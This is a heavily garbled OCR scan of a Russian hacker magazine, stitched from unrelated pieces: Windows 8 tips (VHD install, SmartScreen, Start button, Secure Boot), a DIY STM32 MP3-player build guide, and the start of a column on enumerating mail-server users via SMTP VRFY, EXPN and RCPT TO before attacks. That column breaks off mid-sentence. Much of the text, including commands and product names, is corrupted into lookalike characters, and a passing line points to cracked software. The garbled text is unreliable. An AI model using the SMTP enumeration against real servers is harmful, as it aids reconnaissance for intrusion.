Нагб йізк, который является обычным файлом). Увы, этот метод доступен только для пользователей ѴѴіпсІоѵѵз 7 ІЖітаІе или Епіегргізе. Такой 
подход позволитудалить новую систему в любой момент. Чтобы провернуть такой трюк, понадобится: 



• установочный образ ѴѴіпсІоѵѵз 8 (ЬіІ.Іу/у2аК0І_); 

• утилита ѴѴіпсІоѵѵз 7 ІІБВ/ОѴй боѵѵпіоаб ІооІ (ЬіІІу/урАѴѴЯ; 

• флешка на 4 Гб (или больше) или РУй-диск и по крайней мере 20 Гб пространства на жестком диске. 



Перед тем как начать, еще одна предосторожность — если у тебя включено шифрование диска с помощью ВіН_оскег, то необходимо его отклю- 
чить перед выполнением всех последующих манипуляций. Все готово, теперь скачиваем образ и с помощью ѴѴіпсІоѵѵз 7 ІІ5В/0ѴЁ) боѵѵпіоасі ІооІ 
делаем загрузочную флешку/диск. Далее открываем консоль управления компьютером (правой кнопкой на «Компьютер», выбираем «Управле- 
ние»), затем выбираем «Управление дисками», открываем меню «Действие» и нажимаем «Создать виртуальный жесткий диск». Выбираем имя 
файла и папку, где он будет храниться. Например, «С:\ѴН0\ѴѴіп8-гр.ѵЬсІ». Формат создаваемого жесткого диска можно выбрать любой, разве что 
при выборе «Фиксированный размер» диск будет немного дольше создаваться. Ну и наконец, задаем размер создаваемого диска, пусть это будет 
60 Гб. Нажимаем «Ок,» и в системе появляется новый неотформатированный жесткий диск. Так что теперь можно смело переходить непосред- 
ственно кустановке самой ОС. Загружаемся с созданной флешки/диска и смело идем до шага выбора типа установки. Типов установки всего два: 
«Обновление» и «Выборочная». При выборе обновления инсталлятор автоматически обновиттвою текущую ОС до ѴѴіпсІоѵѵз 8. Так что нам нужна 
выборочная установка. Но перед тем, как нажать на нее, надо подключить созданный ѴНО-диск, так как установщик его не видит. Нажимаем 
<5ЫЦ+Е10> для вызова консоли. Теперь постараемся найти, на каком диске располагается наш ѴНО-файл. 

> (Иг сі: 



У меня папка с файлом располагалась на диске й (у тебя может быть по-другому). После чего запускаем утилиту сіізкрагі для подключения 
виртуального диска: 



> сіізкрагі 

> зеіесі ѵсіізк Я1е=сІ : \ѵМ\\л/іп8-гр. ѵМ 

> а 'К а с И ѵсІІБк 

> ехіі 



Закрываем консоль и нажимаем на выборочную инсталляцию. В появившемся окне выбираем наш диск на 60 Гб и, несмотря на появившееся 
предупреждение, что ѴѴіпсІоѵѵз не может быть установлена на этот диск, продолжаем установку. Вот, собственно, и все хитрости. Когда тебе надо- 
ест играться с новой осью, ее легко можно удалить — просто удалив ѴНО-файл и удалив запись о ней из меню выбора ОС (тзсопГд -> Загрузка). 



КйіМіщ-ил сгрѵ*-і 
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Місгобоіі ѵѵі псіоѵѵб следит за тобой [Ѵегзіоп 6.2.9200] 

(с) корпорация Майкрософт, 2012. все права защищены. 

С:\Іі5ег5\апіІ5іег>рагапоіа 

Очень неприятным сюрпризом, который обнаружил Надим Кобейсси, оказалось то, что ѵѵі псіоѵѵб 8 отсылает на серверы МісгобоФі 
информацию о любых устанавливаемых пользователем программах. Все дело в том, что ѵѵі псіоѵѵб 8 имеет функцию под названи- 
ем \л/і псіоѵѵб БтагіБсгееп, которая по умолчанию включена. Эта функция предназначена для наблюдения за всеми приложениями, 
которые пользователь попытается установить, чтобы предупредить о статусе безопасности устанавливаемой программы. Схе- 
ма работы такова: после открытия установщика любого программного пакета - браузера, графического редактора и так да- 
лее - ѴѴі псіоѵѵб БтагіБсгееп собирает некоторую идентификационную информацию о приложении и отсылает данные на серверы 
Місгобоіі. Если будет получен ответ, что приложение не подписано необходимым сертификатом, то пользователь будет решать, 
запускать ли установщик или проигнорировать его. місгобоіі отсылается имя файла (зашифрованное Ьазе64), хеш установщи- 
ка и его цифровая подпись (если есть). Чтобы отключить эту «мегаполезную» функцию, нужно проследовать в «Панель управ- 
ления -> Система и безопасность -> Центр поддержки», кликнуть на раздел «Безопасность» и в развернувшемся списке найти 
ѵѵі псіоѵѵб БтагіБсгееп. Открыть «настройка параметров» и установить флажок напротив «ничего не делать (отключить ѵѵі псіоѵѵб 
БтагіБсгееп)». 
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Как вернуть кнопку «Пуск»? - Блокнот — ^ 




И 


П|2*1ы йВДмі' І*Ш 





Несмотря на то что Місгобо-Рі методично старается изжить кнопку «Пуск» 
из своей новой ОС, все еще есть способы вернуть ее обратно. Для тех, 
кому пришлась не по душе новая система тайлов, есть несколько сторонних 
утилит, способных вернуть системе традиционный вид: ѴІБІагі (Ьіі Лу/Мгеи2) ; 
Б1аг18 (Ы1 . 1у/хК-Рг0Е) ; Сіэббіс БЬеІІ (Ьіі . 1у/40В41х) . 

Если не хочется ставить сторонние утилиты, то можно воспользоваться 
сочетанием клавиш <іаііп+Х>: в левом нижнем углу отобразится меню, из которого 
можно получить быстрый доступ ко всем привычным утилитам - диспетчеру задач, 
консоли, проводнику, диспетчеру устройств и так далее. 
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Бесиге Вооі 

Д ата: 05.09.2012 Щ\ I I ЯБ I А АПІІЗІѲГ 



Поводом для очередных холиваров в Сети послужило намерение М іеговой требовать безопасной загрузки ІІЕРІ от систем, 
официально сертифицированных под ѴѴіпсІоѵѵз 8. В двух словах, Бесиге Вооі позволяет зашивать в железо ключи для про- 
верки сигнатур загрузочного кода и отказываться на аппаратном уровне от выполнения тех загрузчиков, которые не про- 
ходят проверку подписи. Вроде бы благие намерения, направленные на борьбу с руткитами и буткитами, а вызвали такую 
бурю негативной реакции. 

Все дело в том, что такой подход может с очень большой вероятностью привести к полному блокированию загрузки 
сторонних ОС (например, Ыпих) на ѴѴіпсІоѵѵз-сертифицированных системах. Безопасная загрузка подразумевает, что все 
микрокоды прошивки и программное обеспечение, участвующее в процессе загрузки, должны быть криптографически 
подписаны доверенным органом сертификации (СА). Это означает, что для «загружаемости» на сертифицированных под 
ѴѴіпсІоѵѵз 8 компьютерах соответствующий дистрибутив Ыпих должен иметь сертифицированные криптоключи от конкрет- 
ного изготовителя компьютера. Из сложившейся ситуации каждый ищет свой выход. 

В РесІ Наі нашли достаточно интересное компромиссное решение. На первом этапе загрузки будет использован специаль- 
ный дополнительный загрузчик, заверенный ключом от компании МісгозоЙ. Функции данного загрузчика будут сведены 
к проверке валидности цифровой подписи следующего компонента цепочки загрузки и передаче управления штатному 
загрузчику 6РІІВ 2, который, как и ядро и все загружаемые в дальнейшем модули, будет подписан собственным ключом 
проекта Ресіога. Первичный загрузчик будет заверен представителями РесІ Наі через сервис МісгозоЙ, позволяющий за 
99 долларов (сервис предоставляет Ѵегізідп) получить доступ к формированию неограниченного числа подписей для ис- 
полняемых файлов. В СапопісаІ пошли своим путем, не связанным с заверением ключей у компании МісгозоЙ. Планируется 
задействовать собственный ключ, который будет включаться в ІІЕРІ прошивки через индивидуальные договоренности с 
каждым производителем оборудования. 
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В общем, к чему приведет внедрение Бесиге Вооі, пока непонятно. 
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Я постарался выбрать все самое интересное в новой ОС, но, увы, не смог найти ничего, что могло бы заставить читателя всерьез задуматься об 
апгрейде «боевой машины». В то же время ограничения и неудобства новой ОС оказываются важным доводом против. 

Все это было ожидаемо, перед нами — переломный момент в истории ѴѴіпсІоѵѵз, первая за долгое время попытка переосмыслить рабочее окру- 
жение пользователя. Ожидаемо и то, что процесс перехода не будет простым и не пройдет в одночасье. Однако на данном этапе я бы никому не 
пожелал стать подопытным кроликом Редмонда. 

Есть и позитивные новости — по последним слухам, корпорация готовится очень оперативно выпустить следующую версию в будущем году. Зна- 
чит, кто-то прислушался ко всем нашим жалобам, остается только ждать. И-Л 
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Вадим Цырульников (І2ІгиІпісоѵйтаіІ.ги) 



ДЕЛАЕМ СЕНСОРНЫЙ 
ПЛЕЕР НАПОДОБИЕ 
ІРОР ТОЦСН 



для звучного 
гаджета 




Если хочешь не отставать от современных 
микроконтроллерных тенденций и иметь 
возможность сделать свой планшет, 
спутниковую автомобильную сигнализацию 
или умный дом — пора разобраться 
с 32-разрядными микроконтроллерами. Сегодня 
мы посмотрим, как работать с основанным 
на Согіех М3 контроллером 5ТМ32 и сделаем 
собственный іРобоподобный плеер. 



ЧТО НАМ НУЖНО? 



Сейчас одни из самых популярных микроконтроллеров на ядре 
Соііех (на ядре семейства Соііех, кстати, делаются и гаджеты 
Арріе) — микроконтроллеры семейства 5ТМ32. Именно с ним мы 
и будем работать на примере 5ТМ32Р103. 

Но вначале разберемся со средствами разработки. Нам нужна 
плата с уже впаянным микроконтроллером и максимумом периферии, 
чтобы в процессе разработки обойтись без паяльника. В качестве от- 
ладочной платы я взял на еВау один из клонов платы Ну РігеЬаІІ (за 76 
долларов продается на Ьіі.Іу/СіСЫгЯ . Микроконтроллер на ней стоит 
5ТМ32Р103ѴСТ6 (72 МГц, 256 Кб РІ_А5Н, 48 Кб 5РАМ, 3 АЦП, 2 ЦАП, 
ОМА, Р5МС, 3 х ІІ5АРТ, 2 х ІІАРТ, 2 х І2С, 3 х 5РІ, САІ\І, 115В 2.0 Р5 и дру- 
гой фарш). Из периферии на плате расположено следующее богатство: 

• М РЗ/ѴѴМ А/М Ю I -декодер и Ай РСМ -кодер Ѵ51 003 — немало- 
важная часть нашего проекта, при ни мает от микроконтроллера 
данные в цифровом виде и воспроизводит их. Также позволяет 
реализовать диктофон, оцифровывая данные с микрофона; 

• ЕІМС28360 — ЕіЬегпеІ-контроллер, позволяющий подключить 
к интернету наш 5ТМ32; 

• СН376 — чип, реализующий 115В -режимы Оеѵісе/Нозі и позволя- 
ющий подключать 50-карты. Реально полезен из-за поддержки 



115В Нов* режима, та к как дает возможность подключать 115В- 
флешки и прочие ІІ5В-накопители к микроконтроллеру через 5РІ 
либо последовательный интерфейс; 

• портСАЫ — позволяет подключить нашу плату к шине автомоби- 
ля; 

• сенсорный резистивный экран 3,2", последовательные порты, 

128 Мб ИАИй РІазГі, порт Р5-485 и куча иных вкусностей. 

Отладочную плату мы выбрали, теперь встает вопрос, как заши- 
вать микроконтроллер на ней. Можно обойтись ресурсами самой 
платы, заливая прошивку через последовательный порт (для этого 
служат джамперы ВооЮ, Вооіі на плате), но гораздо удобнее поль- 
зоваться внутрисхемным отладчиком, который позволит в любой 
момент видеть все, что творится внутри микроконтроллера. Можно 
взять ЛАС-дебаггер, но гораздо дешевле и целесообразнее будет 
взять любую из плат семейства 5ТМ32 Оізсоѵегу. Я пользуюсь 
5ТМ32ЮІ5С0ѴЕРУ со встроенным ЖК-экраном, предназначенной 
для разработки портативных устройств с малым энергопотребле- 
нием (стоит 22 доллара), но можно взять плату подороже и с более 
мощным МК — 5ТМ32Р40І5С0ѴЕРУ (за 30-35 баксов, например, 
на все том же еВау: Ьіиѵ/ЫіОѴѴѴ I — на борту микроконтроллер 
5ТМ32Р407 (168 МГц, 1 Мб РІазЬ, 192 Кб РАМ, ЕШегпеЦ интерфейс 
камеры, 05Р и другое), акселерометр, МЕМ5-микрофон, ЦАП, 115В 
0Т6 разъем + примеры с исходными кодами по работе с акселеро- 
метром, диктофон/плеер с использованием внешней ІІ5В-флешки 
и так далее. Чтобы соединить отладчик с отладочной платой, удоб- 
но использовать джамперный кабель (2 доллара на Ьіі.1ѵ/М95Ѵір ). 

Что касается программного обеспечения — тут нет заведомо 
наилучшего решения, на вкус и цвет каждому свое. Есть бес- 
платная среда ЕсІірзе/ССС, есть платные ІАР и КеіІ ( ѵѵѵѵѵѵ.кеіі.сот/ 
сІето/еѵаІ/агт.Ыт ). Последняя наиболее распространена и, на 
мой взгляд, куда удобнее остальных. Бесплатная версия позволяет 
собирать до 32 Кб кода, но с волшебными лекарствами, исцеляю- 
щими от этого ограничения, проблем на просторах инета нет. 

Залить прошивку в микроконтроллер можно через среду раз- 
работки либо отдельной утилитой 5ТМ32 5Т-І_ІІ\ІК ІЛіІіІу. 
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В качестве графической библиотеки для рисования объектов 
на экране и работы с сенсорной панелью экрана выбрана адап- 
тированная для 5ТМ32 библиотека МісгосЬір СгарЫсз ЫЬгагу 
(входит в состав бесплатного пакета МісгосЬір Арріісаііоп ЫЬгагіез, 
доступного по адресу: ЫЫу/РбУЫОЯ . Она содержит драйверы боль- 
шинства распространенных контроллеров Юй-экранов, элементы 
взаимодействия с пользователем (кнопки, слайдеры, чекбоксы 
и так далее), то есть предоставляет интерфейс твоему приложению 
для работы с Юй-экраном и его сенсорной панелью. В проекте 
она лежит в /зоигсе/сосІе/6111/. К слову говоря, у производителя 
этих микроконтроллеров — компании 5Т есть своя собственная 
бесплатная графическая библиотека для микроконтроллеров 
5ТМ32 — 5ТМ32 ЕтЬесИесІ 6Ш ЫЬгагу, но она значительно менее 
распространена, и ее использование куда хуже разжевано в интер- 
нете, чем у МісгосЬір СгарЫсз ЫЬгагу. 

Отдельно стоитупомянуть про одну из утилит, входящих в ком- 
плект этой библиотеки, — ОгарЬіс Резоигсе Сопѵегіег. Утилита 
позволяет конвертировать изображения в форматах ВМР, Ы РЕС, 
шрифты (как в виде отдельных файлов, так и установленных в си- 
стему, в том числе Тше Туре) и бинарные файлы в НЕХ-формат (на 
выходе получаем Си-файл, который можно использовать в своем 
проекте). Именно таким образом в наш проект загружаются не- 
стандартные иконки, кнопки и шрифты, в том числе кирилличе- 
ские. Шрифты, сгенерированные этой утилитой, хранятся в нашем 
проекте в файле зоигсе/РопІз.с, а картинки и иконки — в зоигсе/ 
РісШгезС32.с (кнопки «вперед», «назад», «стоп», «проигрывание» 
и иконка с изображением динамика). 



Рис. 1. Схема подключения внутрисхемного отладчика 



РЕАЛИЗАЦИЯ 



Весь аппаратный и программный инструментарий собрали, теперь 
самая пора начинать реализацию. Подключаем отладочную плату 
к отладчику, как показано на рис. 1, подключаем по 115В и отлад- 
чик, и саму плату (при этом если установлены АІсоЬоІ 120% или 
йаетоп Тооіз, то их нужно удалить, иначе отладчик в системе не 
определится), выставляем джамперы в соответствии с табл. 2. 
Теперь пойдем по простому пути. Запускаем 5ТМ32 5Т-ІЛЧК Шііііу, 
открываем рго)есі/ОЬ)/МРЗ_РІау.Ьех и прошиваем. Все, теперь на- 
шим самодельным айподом можно пользоваться. 

Прошивка самодельного гаджета поддерживает работу с карта- 
ми 50/50НС до 32 Гб с файловой системой РАТ16/РАТ32, воспро- 
изведение МРЗ/ѴѴМА/ѴѴАѴ/МЮ-файлов с частотой дискретизации 
5-384 Кбит/с (файлы нужно складывать строго в папку/Мизіс/ на 
карте), ЬРС-файлы (тексты песен с метками синхронизации, файлы 
складывать в папку /Ігс/ на карте). Управление плеером — полно- 
стью и исключительно сенсорное. Естьтри режима воспроизведе- 
ния: Мосіе Рер — проигрывается один и тот же файл, Мосіе Сус — по 
порядку проигрываются циклично все файлы, Мосіе РпсІ — прои- 
грывание в случайном порядке всех файлов на карте. 



КАСТОМИЗАЦИЯ 



А теперь самое интересное — поговорим о том, как внутри все 
устроено и как подпилить этот гаджет под себя. 

Для микроконтроллеров с ядром СогІех-МЗ (МО) базовой явля- 
ется библиотека СМ5І5 компании АРМ — общая для всех микрокон- 
троллеров всех производителей с данным ядром, стандарт взаимо- 
действия ПО с ядром. Каждый производитель добавляет к ядру свой 
набор периферии и задействуетте или иные возможности ядра, 
предоставляя библиотеку — надстройку над СМ5І5. У 5ТМ32 такая 
библиотека именуется ЗіапсІагсІ РегірЬегаІ ЫЬгагу (5РІ_, библиотека 
драйверов периферийных устройств, в проекте нашего гаджета 
она в папке /зоигсе/ЫЬгагу). Если СМ5І5 компании АРМ реализует 
программный интерфейс к самому ядру Согіех, то 5РІ_ компании 5Т 
реализует интерфейс к периферии микроконтроллера, лежащей за 
пределами ядра Согіех. СМ5І5 отдельно скачивать нет необходимо- 
сти — она уже входит в комплект поставки 5РІ_ ( ЫЫу/№2Ци8 ). 



РАБОТА СО СРЕДОЙ КЕИ 



Среды могут быть разными, мы будем рассматривать далее на 
примере КеіІ. Послетого как установили КеіІ, открываем им файл 
рго)есі/МРЗ_РІау.рго), далее уже в самом КеіІ открываем «сосіе — > 
таіп.с» — это и есть «точка входа» программы МРЗ-плеера. Чтобы 
посмотреть, где описана та или иная функция, в исходнике клика- 
ем правой кнопкой мыши по названию функции и в появившемся 
меню выбираем «Со То йеПпіЬоп (И '[название_функции]'». Чтобы 
посмотреть, как твоя программа работает на реальном девайсе, 
нужно проверить, что отладчик и плата МРЗ-плеера соединены 
друг с другом так, как показано на рис. 1, далее подключить по 
115В саму плату МРЗ-плеера (Ну РігеЬаІІ) и плату отладчика (5ТМ32 
0І5С0ѴЕРУ) к компьютеру — при этом в системе отладчик должен 
определиться как ЗТМісгоеІесІгопісз 5ТІ_іпк сіопдіе. Плату МРЗ- 
плеера тоже необходимо подключать по Ы5В, так как питания от- 
ладчика недостаточно для платы плеера. Для начала отладки вы- 
бираем «йеЬид — > 5іагі/5іор ЬеЬид зеззіоп» — откроется окно, как 
на рис. 2, и при этом в микроконтроллер зальется уже собранная 
ранее прошивка МРЗ-плеера. Здесь можно отметить переменные 
твоей программы, изменение значений которых в микроконтрол- 
лере ты сможешь видеть на лету, — для этого в исходнике кликаем 
правой кнопкой мыши по названию нужной переменной и выби- 




Рис. 2. КеіІ в режиме отладки 
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раем «АсИ 'название_переменной' Іо... -> ѴѴаІсЬ 1» — в дальней- 
шем значение указанной переменной можно будетувидеть в окне 
«Ѵіеѵѵ — > ѴѴаІсЬ ѴѴіпсІоѵѵз — > ѴѴаІсЬ 1 ». 

Сбросить микроконтроллер можно командой «йеЬид — > Резеі 
СРІІ». Чтобы начать выполнение программы в твоем девайсе, вы- 
бираем «йеЬид — > Рип». В процессе отладки бывает необходимо 
приостановить работу программы на нужных участках кода (чтобы 
посмотреть значения переменных в этот момент, например). Для 
этого существуют «точки останова» — Вгеакроіпіз. Для этого два 
раза кликаем по номеру строки в файле исходника — номер поме- 
чается красным прямоугольником, указывающим, что при попада- 
нии на эту строку выполнение программы будет приостановлено. 

Также довольно часто для отладки используют ком-порт. В нуж- 
ных местах программах ставится обычный вызов ргіпіШ, который 
перенаправляет вывод в порт ІІ5АРТ микроконтроллера. Такая 
техника используется и в нашем МРЗ-плеере. Подключаем ІІ5АРТ1 
к ком-порту компьютера, открываем терминалку и смотрим выво- 
димые программой отладочные данные. 



ЛОГИКА РАБОТЫ МРЗ-ПЛЕЕРА: 
ГРАФИЧЕСКИЙ ИНТЕРФЕЙС Ш 



Начнем наконец вникать в работу МРЗ-плеера «изнутри». Для на- 
чала — работа с графической библиотекой (рис. 3). Вначале не- 
обходимо правильно настроить ноги микроконтроллера для работы 
с экраном и включить на этих ногах тактирование — за это отвечает 
І_СО_СопЯдигаІіоп(). Отдельно настраиваются ноги, к которым 
подключен сенсорный экран, — ТР_ІпіШ (на экране стоит четы- 
рехпроводная резистивная сенсорная панель, которая подклю- 
чена к микросхеме АЦП А07843 на борту экрана, а уже та, в свою 
очередь, по интерфейсу 5РІ подключена к 5ТМ32). После этого нам 
необходимо проинициализировать библиотеку МісгосЬір ОгарЫсз 
ЫЬгагу, вызвав 60І_ІпіШ, далее обстрелять байтами экран — за- 
дать ему настройки для корректной работы — І_С0_ІпіІіаІІ2е(). 

Теперь графическая система нашего плеера готова к работе, но 
рисовать графический интерфейс на экране еще рано — при первом 
включении нужно откалибровать экран (предлагаем пользователю 
три раза нажать по разным уголкам экрана), для этого и вызы- 
ваем ТоисЬРапеІ_СаІіЬгаІе(). Только после этого самая пора начи- 
нать рисовать интерфейс на экране вызовом встроенной функции 
библиотеки СОЮгаѵѵО — тем самым мы вызовем определенную нами 
СОЮгаѵѵСаІІЬаскО. При первом вызове она вызовет СгеаІеМрЗбиіО, 
где перечисляем используемые цветовые схемы и определяем вы- 
водимые на экран графические объекты (кнопки, слайдеры и про- 
чее), а при повторных вызовах будет менять выведенные на экран 
данные (например, время проигрывания файла). Заполняем структу- 
ру с координатами точки нажатия на сенсорном экране при помощи 
ТоисЬбеіМздО и обрабатываем ее средствами графической библио- 
теки путем вызова 001_Мзд() — эта функция определит, на какой 
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Таблица 1. Разъемы для подключения 
внутрисхемного отладчика 
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Таблица 2. Схема установки джамперов 
на плате 
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Рис. 3. Схема работы с графической библиотекой 



объект пользователь нажал, и при следующем вызове СОЮгаѵѵО 
наша программа обработает это нажатие и внесет соответствующие 
изменения в вывод на экране. Таким образом, мы циклически бега- 
ем по цепочке ООЮгаѵѵП — > ТоисЬОеіМздИ — > 60І_Мзд(). 



ЛОГИКА РАБОТЫ МРЗ-ПЛЕЕРА: ЧТЕНИЕ 
И ВОСПРОИЗВЕДЕНИЕ МУЗЫКАЛЬНЫХ ФАЙЛОВ 



За работу с папками и файлами на 50/50РІС-карте отвечает бес- 
платная китайская библиотека Чана — РаіРз МосМе ( Ьіі.1ѵ/МХУ833 ). 
реализующая функции для работы с файловыми системами РАТ16/ 
РАТ32 на микроконтроллерах АРМ, АѴР, РІС24 и многих других. Она 
не заточена под какой-то определенный носитель (50-карта, ІІЗВ- 
флеш) и при наличии соответствующего драйвера может работать 
хоть с жестким диском, подключенным к микроконтроллеру. 

Работа по воспроизведению музыкальных файлов, за исключе- 
нием рассмотренного выше вывода на экран, выглядит следующим 
образом: 

Инициализация: 

1. 5РІ_СопГідига1:іоп — конфигурация выводов5ТМ32 
для 50-карты. 

2. 50_ІпіШ — инициализация 50- карты. 

3. Ѵз1003_ІпіШ — конфигурация выводов 5ТМ32 для Ѵзі 003. 

4. МрЗРезеШ, ѴзЮОЗЗоЙРезеШ — сброс Ѵзі 003. 

5. І_оасІРаІсЫ) — инициализация Ѵзі 003. 

6. {_тоипШ — монтирование файловой системы 50- карты. 

7. РіІІгаІеМизісО — считывание информации по М РЗ/ѴѴМ А/ѴѴАѴ/ 
МЮ-файлам на карте. 

Рабочий цикл (воспроизведение): 

1. {_ореп() — открытие выбранного музыкального файла. 

2. РіпсИгсО — поиск соответствующего Ігс-файла для открытого 
ранее файла. 

3. ѴзЮОЗ_СМО_ѴѴпІе(5РІ_ѴОІ_,ѵоІі) — установка выбранногоуровня 
громкости. 

4. Пишем в Ѵзі 003 аудиоданные блока ми по 512 байт. Аудиокодек 
каждый раз, когда готов принять от нас очередную порцию дан - 
ныхдля воспроизведения, дергаетлинию ОРЕО. 
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5ТМ32 для звучного гаджета 



Гігое: 04*10 00: 00/04 НО 







Рис. 4. Графический интерфейс МРЗ-плеера 



ЧТО ДАЛЬШЕ? 



На самом деле вовсе необязательно использовать аппаратный 
МРЗ-декодер (ѴзІООЗ). Микроконтроллер 5ТМ32 вполне способен 
самостоятельно справиться с задачей декодирования МРЗ, и для 
этого производитель (5Т) предоставляет бесплатную библио- 
теку для работы с МРЗ. Но по патентным соображениям данная 
библиотека не распространяется свободно, требуется подписание 
соглашения на ее использование — в основном по этой причине 
декодирование выполняется в нашем плеере отдельной микросхе- 
мой. Также существует вариант использования Неііх МРЗ йесосіег 
( баіаІуре.беІіхсоттипііу.огд/МрЗсІес ) для программного декодиро- 
вания МРЗ силами 5ТМ32. 

Во многих МРЗ-плеерах имеется встроенный РМ-радиоприем- 
ник, который можно добавить и в наш плеер. Наиболее распро- 
странена для этих целей пускай и не новая, но зато дешевая (2 
доллара) микросхема ТЕА5767, которая общается с микрокон- 
троллером через интерфейс І2С и не требует внешней антенны. 

В интернете можно найти много примеров работы с ней плюс ее не 
нужно искать в магазинах — велика вероятность, что, если раз- 
берешь старый ненужный плеер с РМ-радио, увидишь эту микро- 
схему. Также можно купить отладочную плату на еВау. Встроенной 
поддержки Р05 нет — предлагается использовать для этого от- 
дельный Р05-декодер 5АА6588, либо можно перейти на использо- 
вание более новой, но куда более дорогой микросхемы РМ-радио 
5ІІ4735 — там поддержка Р05 уже встроена. 

Наигравшись с воспроизведением МРЗ и прослушиванием 
радио, ты можешь захотеть добавить возможность просмотра 
фильмов в МРЕС4. Просмотр видео можно реализовать на 5ТМ32, 
но в ограниченном виде (вряд ли сумеешь выжать более 20 Ірз 
16-ЬіІ ОѴЗА видео на Согіех М3 либо 30 Ерэ 0Ѵ6А МоІіопОРЕЗ на 
Согіех М4], поэтому тут нужно будет переходить на использование 



старших Согіех'ов. Для этого можно присмотреться к отладочной 
плате РгіепсіІуАРМ (например, РгіепсІІуАРМ МІПІ2440 — 85 дол- 
ларов на еВау), на которую ставятся микроконтроллеры с ядром 
АРМ8/9/11. А это уже возможность запуска Ыпих/ѴѴіп СЕ/АпсІгоісІ на 
самодельном девайсе (в случае с 5ТМ32 линукс не поставить, толь- 
ко его обрезанный вариант исЫпих). Таким образом можно плавно 
перейти от создания своего Арріе іРосІ к разработке самодельного 
Арріе іРаб. 

Но в большинстве случаев использование старших кортек- 
сов — это стрельба из пушки по воробьям, плюс с ними на порядок 
сложнее работать, чем с Согіех М, поэтому сейчас наиболее рас- 
пространены 5ТМ32 при решении бытовых задач. И уж точно не 
стоит начинать изучение микроконтроллеров с РгіепсіІуАРМ. 

В заключение не могу не упомянуть про один очень полез- 
ный инструмент для отладки микроконтроллерных (и не только) 
устройств. Допустим, у нас есть ненужный рабочий промышленный 
МРЗ-плеер с микросхемой РМ-радио на борту, эту микросхему хо- 
чется прикрутить к своему девайсу, и из даташита не совсем понят- 
но, как с ней работать. Тут на помощь приходит логический анали- 
затор, которым мы можем подрубиться к исследуемому устройству 
и посмотреть, как производится обмен данными с микросхемой — 
что, например, нужно сделать, чтобы увеличить громкость. Также 
бывает необходимость в своем устройстве посмотреть, «что же там 
происходит на уровне сигналов», — внутрисхемная отладка далеко 
не всегда позволяет решить все проблемы. 

Наиболее популярны логические анализаторы (которые также 
умеют работать и как осциллографы) ІІЗВее АХ/йХ и Заіеае — под- 
ключаются к компьютеру через ІІ5В-интерфейс, на выходе — щупы 
для подключения к отлаживаемому устройству. На еВау/АПЬаЬа/ 
ОеаІЕхІгете большое разнообразие клонов, которые умеют ра- 
ботать с софтом как ІІЗВее, так и Заіеае, по цене от 20 долларов. 
Также у них есть поддержка большинства популярных протоко- 
лов — І2С, 5РІ, САІМ, 115В, Р5232, Р5485 и множества других. 



ВМЕСТО ПОСЛЕСЛОВИЯ 



Вот и все — плеер готов. По ссылке ЛІе5.таіІ.ги/0Е255Е выложен 
полный проект МРЗ-плеера со всеми исходниками, можешь ковы- 
рять его и совершенствовать. 

Даже если ты никогда раньше не имел дело с микроконтрол- 
лерами, этот самодельный МРЗ-плеер будет полезен и наверняка 
даст стимул и дальше осваивать эту область, ведь куда приятнее 
начинать изучение не с банального моргания светодиодом, а с 
чего-то более полезного и функционального. А куда развиваться 
дальше — решать тебе: можешь добавить поддержку 0В0-ІІ и сде- 
лать бортовой компьютер для машины медиацентром или целую 
систему домашней автоматизации. Не бойся и твори! ЗЕ 




Рис. 5. МРЗ-плеер в сборе с отладчиком 
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ѴѴАКЫІЫС 
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ни автор не несут 
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материалами данной 
статьи. 



Все описанные 
программы 
ты найдешь 
на прилагаемом 
кжурналу диске. 



ПОЛУЧИТЬ СПИСОК ПОЛЬЗОВАТЕЛЕЙ ЧЕРЕЗ 5МТР 



ЗАДАЧА 



РЕШЕНИЕ 

Как мы с тобой уже знаем, перед проведением атак на какой бы 
то ни было хост, сайт, корпоративку или в итоге компанию нам 
необходимо собрать максимум информации. Чем больше, тем 
лучше. Ведь достаточно часто бывает, что какие-то лайтовые 
баги, позволяющие нам получить вроде бы не слишком важную 
информацию, впоследствии очень помогают при эксплуатации 
критических уязвимостей. 

В прошлых номерах мы касались в основном сбора инфы 
через веб, но не только это нам доступно. На самом деле есть 
масса олдскульных протоколов, которые могут позволить нам 
выведать достаточно много интересного. Старые протоколы 
разрабатывались в основном без оглядки на безопасность, 
а потому очень дружелюбны к атакующим :). Итак, сегодняшний 
пример — 5МТР, «созданный» еще в 70-х годах :). 

По вики, 5МТР (Вітріе МаіІ Тгапзі'ег Ргоіосоі) — это сете- 
вой протокол (ТСР, 25-й порт), предназначенный для передачи 
электронной почты в сетях ТСР/ІР. В то время как почтовые сер- 
веры и другие агенты пересылки используют 5МТР для отправки 
и получения почтовых сообщений, клиентские почтовые при- 
ложения — обычно только для отправки сообщений на почтовый 
сервер для ретрансляции. 

5МТР — это простой протокол. Даже при использовании 
Ыеісаі; или Теіпеі; у нас есть возможность отправить письмо. 

Для этого нам потребуется отправить всего несколько команд: 

1) НЕЮ - приветствие серверу; 

2) МАИ ГРОМ: - от кого письмо: 

3) КСРТ ТО: - кому письмо; 



4) ЭАТА - после этой команды идет тело письма. Оконча- 
ние тела обозначается точкой в начале новой строки. 



На рисунке ты можешь увидеть пример, но рекомендую по- 
пробовать ручками. 

С протоколом, я думаю, все понятно — теперь к делу. Есть три 
основных способа, как можно выудить у 5МТР-сервера список 
пользователей, но основаны они на одном и том же поведе- 
нии — при указании несуществующего пользователя сервер 
нам об этом сообщает. Таким образом, для того чтобы получить 
список пользователей, нам необходимо запастись списком воз- 
можных имен и перебрать их. Хотелось бы сразу отметить, что по 
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факту это не всегда имена пользователей. Мы получаем имена 
почтовых ящиков (то есть с учетом возможных имен-алиасов), 
но они достаточно просто соотносятся с пользователями. 

Первый способ — воспользоваться командой ѴРРѴ, которая, 
по сути, и создана для того, чтобы проверять, существует ли поль- 
зователь, и, если существует, выводить детальную инфу о нем 
Второй способ — командой ЕХРІЧ. Она используется для запроса 
у сервера списков рассылок. В случае успеха мы опять-таки мо- 
жем получить полную информацию и алиасы. Третий — коман- 
дой РСРТ ТО. Здесь мы должны эмулировать отправку письма 
(то есть указать «МАИ РРОМ» сначала), если такой пользова- 
тель отсутствует, нам об этом сообщат. Пример использования 
можно увидеть на том же скриншоте. 

С практической точки зрения важно отметить, что ко- 
манды ѴРРУ и ЕХРЫ по умолчанию запрещены на многих 
5МТР-серверах, но проверить их все равно желательно. 

А кроме того, различные 5МТР-серверы отвечают несколько 
по-разному, так что желательно сначала проверить ответы 
сервера ручками. 

Ну и понятно, что делать перебор руками бессмысленно. А по- 
